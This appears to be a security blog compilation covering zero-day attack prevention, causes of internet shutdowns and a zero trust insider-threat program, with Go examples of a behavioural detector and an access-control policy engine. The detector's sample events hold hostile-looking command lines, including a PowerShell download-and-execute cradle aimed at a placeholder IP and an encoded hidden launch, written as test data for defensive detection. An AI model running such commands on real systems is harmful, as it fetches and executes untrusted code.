While most malware and hacking attempts can be addressed with up-to-date security software such as antivirus products, some vulnerabilities are not addressed immediately, creating an opportunity for successful attacks. Zero day attacks take advantage of security flaws in a program that the developers either don't know about or have not yet fixed. For an unprepared developer or software vendor, a successful zero day attack can be catastrophic, resulting in leaked data, stolen assets, or a loss of customer trust. Though these attacks are hard to anticipate and hard to address, there are zero day attack prevention practices and vulnerability management strategies that developers and software owners can use to limit the damage.

Detecting a Zero Day Attack

In most cases, developers won't have a chance to stop a zero day attack before it happens: if there is a vulnerability in their code that they don't know about, they likely won't learn of it until the attack has already occurred. For this reason, application owners must stay on top of known vulnerabilities and fix them as soon as possible, so that attackers are left with only the genuinely unknown ones.

Zero day attacks can be detected by monitoring network and host activity where possible and watching for irregularities. Anomaly-detection tools, increasingly built on machine learning, can keep an eye on traffic automatically and notify system owners of unusual activity, for instance a server that suddenly opens outbound connections it never made before.

Specific Strategies: Efficient Patch Management

Containment is arguably the most important step in an incident response plan, as it prevents further damage from spreading once an attack is under way. At the heart of containing an incident is closing the flaw that allowed it: deploying the vendor's patch as soon as one exists, and until then blocking the exploit path with configuration changes, firewall or WAF rules, or by isolating the affected systems. The sooner the hole is closed, the fewer losses will be sustained.

To patch a flaw as quickly as possible without disrupting workflow, patch development can be outsourced to custom software providers. This process can even be partially automated, so that as soon as a breach is identified, a request to identify and patch its source is placed immediately. Large enough organizations might consider maintaining a dedicated team to patch bugs and flaws as they are identified.

Zero Day Exploit Prevention

Though zero day attacks are by definition nearly impossible to prevent once a flaw exists, there are methods by which an organization can limit the number of zero day exploits it is affected by.

First, organizations must thoroughly test systems and software before putting them into active use, and hire white-hat hackers to probe security so that vulnerabilities are discovered and patched before release. Some project timelines won't allow for testing before release; in those situations, every effort must be made to test the system as soon as it is in use.

Another way to avoid a zero day attack is to keep a discovered exploit off the market. When a researcher discovers a flaw, they can either report it to the developer or sell it to a broker. By incentivizing researchers to report findings directly, a developer can preempt an actual attack. A bug bounty that rewards reported flaws is the usual form, though the reward and the disclosure rules must be set carefully so that the program encourages responsible reporting rather than feeding the exploit trade.

Though file-signature techniques won't catch a zero day attack until after it has been identified, once the owners of the first affected system identify the malware and share its signature or indicators, attacks on other systems can be prevented.

Specific Strategies: Next Generation Antivirus

Next generation antivirus (NGAV) is useful for preventing and responding to zero day attacks in ways that traditional antivirus cannot. Because traditional antivirus identifies threats by matching known signatures as new files are introduced to the system, zero day attacks that use document macros, remote logins or in-memory manipulation leave no such file to match and are invisible to it. NGAV instead records and analyzes events within a system, such as which process launched which and with what command line, and flags unusual behaviour. This makes it a powerful tool to detect and respond to zero day attacks, and possibly prevent some from taking full effect.
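The behavioural rules such a tool applies are simple to state once the process-creation events are available. The following is an added example written for this page, not code from the original article or from any NGAV vendor: a Go rule engine over a constructed process tree (hosts, paths and the command lines are made up) that flags an Office application spawning a script host, PowerShell run with an encoded command, a PowerShell download cradle, and a shell started inside a WinRM remote session, none of which depends on a file hash.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcEvent is one process-creation event as an endpoint sensor would record it.
type ProcEvent struct {
	Host, Parent, Image, CmdLine string
}

// Alert is one behaviour rule firing on one event.
type Alert struct {
	Rule  string
	Event ProcEvent
}

var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true, "outlook.exe": true}
var scriptHosts = map[string]bool{"powershell.exe": true, "cmd.exe": true, "wscript.exe": true, "cscript.exe": true, "mshta.exe": true}

// behaviourRules describe how attacks act rather than what their files hash
// to, so a macro dropper nobody has seen before still trips them.
var behaviourRules = []struct {
	Name string
	Hit  func(ProcEvent) bool
}{
	{"office-app-spawns-script-host", func(e ProcEvent) bool {
		return officeApps[e.Parent] && scriptHosts[e.Image]
	}},
	{"powershell-encoded-command", func(e ProcEvent) bool {
		c := " " + strings.ToLower(e.CmdLine) + " "
		return e.Image == "powershell.exe" && (strings.Contains(c, " -enc ") || strings.Contains(c, " -encodedcommand ") || strings.Contains(c, " -e "))
	}},
	{"powershell-download-cradle", func(e ProcEvent) bool {
		c := strings.ToLower(e.CmdLine)
		return e.Image == "powershell.exe" && (strings.Contains(c, "downloadstring(") || strings.Contains(c, "invoke-webrequest") || strings.Contains(c, "iex ("))
	}},
	{"script-host-from-remote-session", func(e ProcEvent) bool {
		return e.Parent == "wsmprovhost.exe" && scriptHosts[e.Image] // WinRM remote shell
	}},
}

// normalize reduces image paths to lower-case basenames so rules compare names only.
func normalize(e ProcEvent) ProcEvent {
	base := func(p string) string {
		return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
	}
	e.Parent, e.Image = base(e.Parent), base(e.Image)
	return e
}

// Detect runs every rule over every event and returns alerts in event order.
func Detect(events []ProcEvent) []Alert {
	var alerts []Alert
	for _, raw := range events {
		e := normalize(raw)
		for _, r := range behaviourRules {
			if r.Hit(e) {
				alerts = append(alerts, Alert{Rule: r.Name, Event: e})
			}
		}
	}
	return alerts
}

// SampleEvents is a constructed process tree, not sensor output from a real host.
func SampleEvents() []ProcEvent {
	return []ProcEvent{
		{"ws01", `C:\Windows\explorer.exe`, `C:\Program Files\Microsoft Office\WINWORD.EXE`, `WINWORD.EXE /n invoice.docx`},
		{"ws01", `C:\Program Files\Microsoft Office\WINWORD.EXE`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A`},
		{"ws01", `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')`},
		{"srv02", `C:\Windows\System32\wsmprovhost.exe`, `C:\Windows\System32\cmd.exe`, `cmd.exe /c whoami`},
		{"srv02", `C:\Windows\System32\services.exe`, `C:\Windows\System32\svchost.exe`, `svchost.exe -k netsvcs`},
	}
}

func main() {
	for _, a := range Detect(SampleEvents()) {
		fmt.Printf("%s on %s: %s -> %s (%s)\n", a.Rule, a.Event.Host, a.Event.Parent, a.Event.Image, a.Event.CmdLine)
	}
}
```

The document opening itself produces nothing, which is the point: the rules fire on the relationship between parent and child and on the shape of the command line, not on the document or the script. In a real deployment each rule needs an allowlist of known-good parent/child pairs for the environment, or the analysts drown in alerts from legitimate automation.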

Responding to a Zero Day Attack

No software is immune to zero day attacks, so it is essential to have a zero day policy in place and to ensure that all team members managing a system are familiar with it. A good zero day policy mitigates damage, minimizes the window in which the vulnerability can be exploited, and ultimately gets the flaw patched.

The six-step incident response process outlined by the SANS Institute is a good outline around which an effective policy can be built. The six steps are as follows:

  1. Preparation:
    This step should be performed before an incident even occurs, and should be updated along with any major software changes. It involves creating a list of all the assets that might be at risk from an attack, such as networks and servers. This list of assets should be prioritized according to which are most important to protect.
    After finishing prioritization, a list of possible incidents should be created. Any attacks that seem likely to occur should be planned for, and guidelines should be put in place for who to contact in the event of each one.
  2. Identification:
    Once a security breach has been detected, as much information as possible must be collected about it. What flaw did it exploit? What was its objective? Is it continuing to spread? Collect all the data provided by security tools and analyze it.
  3. Containment:
    The attack’s entry point must be sealed off. The flaw that was identified in the previous step should be patched as quickly as possible. If possible, stop any remnants of the attack from spreading farther than they already have by temporarily closing off the connections between infected systems and those that are yet to be affected.
  4. Eradication:
    Any remaining activity resulting from the attack needs to be stopped. The threat may have spread between systems, and will need to be removed from any that have been affected.
  5. Recovery:
    Return the affected systems to normal operations. If data was stolen or a third party was otherwise harmed, they must be notified.
  6. Lessons Learned:
    In this step, the incident is analyzed. Was the response to the attack effective? Where did it fall short, and how could it have been improved? How could similar attacks be prevented in the future, or at least dealt with more quickly?

Which Strategies are Right for Your Organization?

Some of the strategies listed above are essential for any organization, such as a policy for preventing and responding to zero day incidents. The more expensive ones, such as NGAV or automated and outsourced patch management, may not fit smaller organizations' budgets. Whether they are worthwhile depends on what is at stake in a successful attack: if millions of dollars could be lost, or millions of lives affected, then every possible step to avoid zero day dangers should be taken.

There are imminent threats facing the Internet and online communications that can lead to an internet shutdown, disruption of internet-based communications, and damage to internet-connected devices. Human error, government intervention and cyberattacks are among the top causes.

Internet Infrastructure Disruption Causes

According to Access Now, there were at least 213 internet shutdowns around the world in 2019, up from 196 in 2018 and 106 in 2017. In many countries, government-ordered shutdowns have become the "new normal." Governments mostly order shutdowns to silence critics, but the consequences of cyberattacks that control or damage internet-connected machines can be far worse.

In 2020 it was reported that an attack attributed to Iran targeted Israeli water facilities, attempting to raise the amount of chlorine added to drinking water, which could have sickened a large part of the population had it not been thwarted; Israel was reported to have responded with a cyberattack on an Iranian port, and later that year a fire at the Natanz nuclear site was widely attributed to sabotage.

Before diving further into scenarios involving internet shutdown, let's understand what the Internet is and how it works.

The Internet Infrastructure

The Internet is a broad term for the global network of interconnected computer networks. It is often confused with the World Wide Web, which is just one service, the web of linked pages, that runs on top of it. The Internet traces back to 1969, when ARPANET connected four host computers, and has grown to billions of devices. No one owns the Internet as such; the non-profit Internet Society, formed in 1992, supports its open development and standards bodies such as the IETF, while individual operators run their own networks.

The internet comprises many networks interconnected with one another. Historically, access to the core was managed by network service providers (NSPs), which sold backbone access or bandwidth to internet service providers (ISPs), and the NSPs exchanged packet traffic at network access points (NAPs); each NSP was required to connect to at least three NAPs, and packets could jump from one NSP backbone to another at them. Today the same role is played by commercial internet exchange points (IXPs) and direct peering between networks.

The Internet Service provider (ISP)

If you have a computer at home or at work, you probably have an internet connection through an internet service provider (ISP). ISPs maintain points of presence (POPs) in the regions they serve; a POP is the point where users' connections enter the provider's network. ISPs in turn connect to one another through exchange points and backbone providers.

To access the Internet, you need a computer along with:

  1. A modem or other access device
  2. A telephone line for dial-up access, or a cable, DSL, fiber or wireless link
  3. An Internet browser and any ISP connection software
  4. An internet service provider (ISP) account

Modem

A modem ("modulator-demodulator") is the hardware component that converts between the signals on the ISP's physical line and the data your home device, computer or network uses, connecting you to the Internet.

Router

A router connects your home computers and IoT devices to each other and to the modem. Routers act as the Internet's traffic police, forwarding data packets toward their destination and controlling what may pass between one network and another. A home router's NAT and firewall also shield the devices behind it from unsolicited traffic from the Internet.

IP Address

Every machine or device on the Internet has an identifying number, its IP address. IP stands for Internet Protocol, the pre-defined rules for communication over the Internet. An IPv4 address looks like 216.27.61.137: four numbers called octets, of which the leading bits (given by the subnet mask) identify the network and the remaining bits identify the host within it. IPv6 addresses, which are 128 bits long, are increasingly used alongside IPv4.

Domain Name System (DNS)

The Domain Name System was designed by Paul Mockapetris in 1983. It automatically maps text names to IP addresses so that you only need to remember the name. For example, www.google.com resolves to an IP address such as 173.194.39.78.

Internet Shut Down Causes

Human error, government intervention and cyberattacks are significant causes of internet disruption globally. Despite the many security measures in place, attacks still cause significant damage. One common method is to target a system with a denial-of-service attack, which makes the system or website unavailable.

Human Error in Network Disruptions

Human error is a factor in network outages; it is estimated that at least a quarter of network disruptions are caused by it. Common sources of error include:

  • Change management – when network changes are not tested properly; one estimate attributes 44% of outages to untested changes.
  • Manual dependence – most IT teams design and operate the network by hand, so a single mistake on their part can cause an outage.
  • Resolution time – how long do IT staff take to repair a faulty connection? Several reports indicate that slow responses extend the period of an outage.

Internet Hacking and Cyber Attack Methods

There are several methods attackers use to bring services down or take them over:

  • Malware – malicious software installed to harm a computer and its owner; attackers use it to control and monitor everything that happens on the machine, and to enlist it in the botnets used for DDoS.
  • Phishing – attackers send links and attachments that users take for legitimate; clicking them exposes the computer to malicious programs or hands over credentials.
  • SQL injection – when an application builds database queries by pasting user input into SQL text, an attacker can supply input that changes the query, letting them read or alter data such as account usernames and password hashes. Parameterized queries prevent it.
  • Cross-site scripting (XSS) – injecting malicious script into a website so that it runs in other users' browsers; attackers use it to steal session cookies, act as the victim, or alter what the page shows.

No matter how the Internet is disrupted, the interruption can be significant in terms of financial cost and human life, inflicting an enormous blow on individuals and businesses alike. Governments and organizations must work together to mitigate the risk of Internet shutdown by preventing attacks and by detecting and responding to incidents quickly.

An insider is an employee or anyone else who has been granted system access to perform certain tasks. The definition extends to non-employees such as consultants, customers, vendors and third parties who likewise have an established identity within the organization and access to various systems.

10 Steps to Build an Insider Threat Management Program with a Zero Trust Model

What is Insider Threat?

Insiders have access to systems to perform tasks related to their job duties. That access, and everything they know, can pose an insider threat and inflict damage on the organization, whether the insider acts intentionally and maliciously or simply makes an error or is negligent. Negligence can also lead to the compromise of their credentials by outside attackers through phishing and other hacking methods. Insider threats include identity theft and fraud, theft of intellectual property, and reduced data integrity and system availability.

One way organizations can mitigate insider threats is the Zero Trust model, which stresses never blindly trusting anyone who attempts to access a system or initiate a transaction, even individuals who have already been granted access privileges.

Brief History of Zero Trust

The concept of zero trust was introduced in 2010 by John Kindervag, then an analyst at Forrester Research. It took some time to be accepted across industries; Google was among the first to announce that it had adopted a zero trust architecture, with its BeyondCorp program. After that, the concept took off as an accepted IT security model and was adopted by many organizations.

How Does It Work?

A zero-trust architecture is a threat management model that does not assume people and systems operating inside the network are entitled to their privileges without repeated verification.

In a traditional castle-and-moat IT infrastructure, the model makes it hard for anyone outside the organization to reach private resources, but it ignores the security risks posed by insiders. In fact, there are countless cases of employees who, wittingly or unwittingly, caused a confidential data leak that led to millions of dollars in damages.

Verification Required for Everyone

A zero trust policy requires verification of everyone, employee or outsider, before they access private resources. No one is trusted by default, whether inside or outside the network. Many cybersecurity experts believe this extra layer of verification can prevent data breaches.

Consequences of a Data Breach

A study by IBM found that a single data breach costs a company over $3 million on average. Losing personal customer data has many consequences, including damage to the business's reputation; many affected customers will take their business elsewhere, which means lower revenue. Because of these insider threat statistics and the consequences raised by industry experts and research reports, many organizations have rightly adopted a zero trust policy to counter insider threats.

How Should an Organization Adopt a Zero Trust Policy

It is recommended to adopt a zero-trust policy gradually to minimize risk. First, analyze the risks your organization faces. Define the scope, create a zero trust implementation plan, and consider your resources, priorities and timelines. You can use internal resources or hire experts to help with the project.

Next, implement authentication controls to secure your systems and most sensitive assets by managing identities and their access. Protect all your assets with multi-factor authentication and a layered authorization model, so that no one has unrestricted access to all systems and data once they are inside. This protects the organization from total ruin because of one unscrupulous employee.

In short, you deploy approval and authentication processes before anyone is allowed onto the network or may make transactions. This protects you from expensive data breaches that could bring down your company. One major danger of insider threats is that outside attackers may take over a privileged account to execute their schemes, which is why privileged accounts must be managed with particular care.

Monitoring with Zero Trust Model

Once you have determined the scope, selected the technology and implemented processes to enforce a zero trust framework, establish a monitoring process to look for malicious activity on the network. Suspicious activity must be flagged and resolved. Monitoring insider privileged access, which may also have been compromised by outsiders, pays off if the process is performed diligently.

Finally, implement a granular attribute-based access control (ABAC) model. ABAC is considered the next-generation model in access management, evolving from role-based access control (RBAC). ABAC makes decisions from a set of attributes such as:

  • subject or user characteristics such as department, position, and IP address,
  • object or system and data characteristics such as sensitivity level, and
  • environmental characteristics such as time of day and location.

The main idea is to define centrally which combination of attributes controls access, in a policy that is evaluated for every request rather than decided once at login. The attributes may differ from system to system.

In general, the key to an effective zero trust policy is to scrutinize all activities in order to identify and block as many unauthorized actions as possible, especially high-risk transactions initiated by privileged account holders.

Continuous Verification Across Each Device

In practical terms, the zero trust framework builds on five key areas:

  • User trust
  • Device trust
  • Transport/session trust
  • Data trust
  • Application trust

For a zero trust program to be effective, implement verification across all five pillars, improving security step by step through scoping, technology and processes. The project can start small and grow as you continue to assess your risks. To succeed, implement it so that it provides the maximum level of security with minimal impact on operations. Handling insider threats this way lowers the risk of a data breach, unauthorized access or unauthorized transactions.
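The ABAC attributes listed above and the user, device and transport/session pillars come together in a single policy decision point. The following is an added example written for this page, not code from the original article or from any vendor's product: a Go policy that evaluates subject, device, environment and resource attributes on every request, with denials ordered ahead of allows so that a failed trust check cannot be overridden, and a default of deny. The department names, the "restricted" sensitivity scale, the 10.0.0.0/8 office range and the business hours are assumptions chosen for the example.

```go
package main

import (
	"fmt"
	"net/netip"
)

// Subject, Device, Environment and Resource carry the attributes the article lists;
// Device and Environment correspond to the device and transport/session pillars.
type Subject struct {
	User, Department, Role string
	MFA                    bool // a second factor was completed in this session
}

type Device struct {
	Managed, Compliant bool // enrolled in management and passing posture checks
}

type Environment struct {
	Source string // client IP as a string; unparseable values fail closed
	Hour   int    // local hour of the request, 0-23
}

type Resource struct {
	Name, OwnerDept string
	Sensitivity     string // public, internal, confidential, restricted
}

type Request struct {
	Subject  Subject
	Device   Device
	Env      Environment
	Resource Resource
	Action   string // "read" or "write"
}

type Decision struct {
	Allow  bool
	Reason string // the rule that decided, or "default-deny"
}

var sensitivityRank = map[string]int{"public": 0, "internal": 1, "confidential": 2, "restricted": 3}

// corpNet is an assumed office/VPN address range, not a real deployment's.
var corpNet = netip.MustParsePrefix("10.0.0.0/8")

func rank(r Request) int { return sensitivityRank[r.Resource.Sensitivity] }

func onCorpNet(r Request) bool {
	addr, err := netip.ParseAddr(r.Env.Source)
	return err == nil && corpNet.Contains(addr)
}

// Rule is one line of central policy: a name, an effect and the attribute combination that triggers it.
type Rule struct {
	Name  string
	Allow bool
	When  func(Request) bool
}

// policy is evaluated top to bottom on every request; the first match decides.
// Denials come first so no later allow can override a failed trust check.
var policy = []Rule{
	{"deny-unmanaged-or-noncompliant-device", false, func(r Request) bool {
		return !r.Device.Managed || !r.Device.Compliant
	}},
	{"deny-sensitive-without-mfa", false, func(r Request) bool {
		return rank(r) >= sensitivityRank["confidential"] && !r.Subject.MFA
	}},
	{"deny-restricted-off-network", false, func(r Request) bool {
		return rank(r) == sensitivityRank["restricted"] && !onCorpNet(r)
	}},
	{"deny-restricted-write-out-of-hours", false, func(r Request) bool {
		return rank(r) == sensitivityRank["restricted"] && r.Action == "write" && (r.Env.Hour < 7 || r.Env.Hour >= 19)
	}},
	{"allow-public-read", true, func(r Request) bool {
		return rank(r) == sensitivityRank["public"] && r.Action == "read"
	}},
	{"allow-own-department", true, func(r Request) bool {
		return r.Subject.Department == r.Resource.OwnerDept
	}},
	{"allow-auditor-read", true, func(r Request) bool {
		return r.Subject.Role == "auditor" && r.Action == "read"
	}},
}

// Decide is the policy decision point; it runs per request, not once at login.
func Decide(r Request) Decision {
	for _, rule := range policy {
		if rule.When(r) {
			return Decision{Allow: rule.Allow, Reason: rule.Name}
		}
	}
	return Decision{Allow: false, Reason: "default-deny"}
}

// SampleRequest is a constructed baseline: a finance analyst reading a restricted
// finance record from a compliant laptop on the office network at 10:00.
func SampleRequest() Request {
	return Request{
		Subject:  Subject{User: "alice", Department: "finance", Role: "analyst", MFA: true},
		Device:   Device{Managed: true, Compliant: true},
		Env:      Environment{Source: "10.1.2.3", Hour: 10},
		Resource: Resource{Name: "payroll", OwnerDept: "finance", Sensitivity: "restricted"},
		Action:   "read",
	}
}

func main() {
	r := SampleRequest()
	fmt.Println(Decide(r))
	r.Subject.MFA = false
	fmt.Println(Decide(r))
}
```

Two details carry the zero trust idea. There is no rule granting an "admin" role blanket access, so an administrator from another department reaching for payroll lands on the default deny, which is what the article means by no one having unrestricted access once inside. And because the decision is a pure function of the current request's attributes, it can be re-run on every access rather than cached from the moment of login, which is how a change in device posture or a session moving off the corporate network takes effect immediately.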

10 Steps to Build a Zero Trust Program

Consider the following steps for creating and implementing a zero trust security program:

  1. Complete a risk assessment
  2. Define your scope – systems, data, people, devices
  3. Create a business plan and promote the idea to the organization
  4. Establish your budget and resources
  5. Develop a zero trust implementation plan
  6. Define trust criteria and boundaries
  7. Deploy multi-step and multi-factor authentication technology
  8. Pay attention to privileged accounts on key applications, databases and devices
  9. Implement an appropriate access control model such as attribute-based model
  10. Monitor access and activities across your systems based on your trust criteria

Conclusion

A zero trust model scrutinizes every person or device requesting access to systems and resources, whether the requester is an insider or an outsider. Ultimately, the goal of zero trust is to address the weakest link in security: the people (and devices) that are trusted entities and have access. While insiders provide an invaluable service, their established access can pose a great risk to the organization and must be continuously verified, validated and approved to protect the company and its most valuable assets from insider threats.
